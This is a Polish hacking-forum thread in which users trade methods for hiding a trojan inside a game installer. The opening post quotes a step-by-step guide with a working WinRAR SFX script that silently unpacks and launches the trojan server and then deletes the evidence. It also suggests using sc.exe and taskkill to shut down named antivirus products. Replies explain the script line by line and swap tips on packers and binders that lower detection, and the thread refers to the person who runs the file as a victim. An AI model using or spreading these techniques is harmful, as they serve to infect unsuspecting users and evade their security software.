Problem z paczka SFX!

ShadowSSJ2

Użytkownik
Dołączył
Sierpień 28, 2006
Posty
4
Chodz o ten cytat.

Na ten pomysł wpadłem już kilka miesięcy temu, i miałem na celu 'obejście' tylko skanerów online. Ostatnio, zauważyłem że podziałało to nawet na kaspersky av (podobno najlepszy). Połączenie plików polega na zaszyfrowaniu kodu, i spakowaniu go razem z innym plikiem (np. instalką jakiejś gry). Nie musisz znać ŻADNEGO języku programowania! Co potrzeba? Winrara, jakiegoś trojana i innego programu.
Jak się za to wziąć:
1. Generujemy server trojana, i jeśli ma opcje zabijania AV, odznaczamy ją.
2. Bindujemy server winrarem zakładając hasło i zaznaczająć 'szyfruj nazwy plików'.
3. Bindujemy już zaszyfrowany plik, moduł rozpakowujący winrara - textowy unrar.exe, oraz plik z np. grą.
4. Tworzymy SFXa:
Kod:
Path=%systemroot%
Setup=%systemroot%system32cmd.exe /c start /min %systemroot%system32cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -pHASELKO trojan.rar&start server.exe&del unrar.exe trojan.rar
Silent=1
Overwrite=2
- wiadomo o co chodzi.
5. Zmiana zawartości pliku: np. ikonka.

Sposób sprawdzony, na 100% omija skanery online, 50% kasperskiego.
Można oczywiście do skryptu sfx dołączyć kilka linijek killujących av takie jak: nod32, avast, bitdefender, avg, arcavir, mksvir, kerio personal 4, i wiele innych - da się: sc.exe i taskkill.exe wystarczy (można nawet dołączyć do paczuszki).

Jeżeli AV nie ma heurystyki, oraz nie stosuje iniekcji dll w procesy systemowe - nie ma szans z takim pliczkiem Very Happy[/b]


No wiec rozumiem to tak:

Musze miec 2 pliki wykonywalne, trojan i cos co sie otworzy.

Nie wiem tylko jak z tym commentem SFX.

Path=%systemroot%
Setup=%systemroot%system32cmd.exe /c start /min %systemroot%system32cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -pHASELKO trojan.rar&start server.exe&del unrar.exe trojan.rar
Silent=1
Overwrite=2

Powiedzcie co oznaczaja te trojan.rar server.exe del unrar.exe.

Zalozmy ze moj trojan nazywa sie serwer.exe, plik 'czysty' ktory sie otworzy to ots.exe, a 'archiwum' bedzie nazywalo sie tak.rar/czy tam exe.

Napiszcie mi jak ma wygladac comment z tymi moimi plikami co napisalem wyzej.

Prosze o odpowiedz.
 

chudy1993

Użytkownik
Dołączył
Luty 24, 2007
Posty
174
Z tego co widzę to wynika że:
trojan.rar - to jest archiwum z trojanem, w którym musi być plik server.exe
server.exe - to jest serwer trojana wypakowany z pliku trojan.rar
unrar.exe - to jest plik odpowiedzialny za wypakowanie trojan.rar
del unrar.exe - ta linijak odpowiada za skasowanie unrar.exe
 

evolucja

Użytkownik
Dołączył
Czerwiec 11, 2007
Posty
110
Może ktoś wytłumaczyć dokładnie o co chodzi?
<
Jak bindować winrarem? I jak z utworzeniem tego SFXa
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Originally posted by evolucja
Może ktoś wytłumaczyć dokładnie o co chodzi?
<
Jak bindować winrarem? I jak z utworzeniem tego SFXa

Pakujesz jakieś pliki do archiwum .rar, następnie po pojawieniu się archiwum na Pulpicie otwierasz go i po prawej stronie będziesz miał taki duży guzik z napisem "SFX", klikasz na niego i dalej ustawiasz w Zaawansowanych opcjach licencje, ikonkę instalatora, jaki plik ma być uruchomiony automatycznie po zainstalowaniu itd.
 

evolucja

Użytkownik
Dołączył
Czerwiec 11, 2007
Posty
110
Heh.. może i działa ale wykrywalne jest... Spakowałem te dwa pliki: serwer i install, uruchamia się ale jest wykrywalne. Szkoda, zna ktoś inny sposób by zmniejszyć wykrywalność?
 

Czak

Użytkownik
Dołączył
Grudzień 31, 2006
Posty
234
Originally posted by lade
zmniejszyc? kupic wersje vip lub uzyc niewykrywalnego bindera. ;]
Taa...albo nauczyć się programować i napisać sobie samemu niewykrywalnego
<
 

adam3076

Użytkownik
Dołączył
Czerwiec 22, 2006
Posty
71
mozna sprubowac uzyc snpack i zmniejszyc server dziala na 100% ale nie na wszystkie av uzylem go na hamtaro i liczba av kture go widzą zmniejszyła sie o połowe a co do niewykrywalnego blindera to av go nie zobaczy ale jak ofiara uruchomi to z czym go zblindowałeś to av zawyje i nie pomoze ci zaden blinder ani winrar
 
Do góry Bottom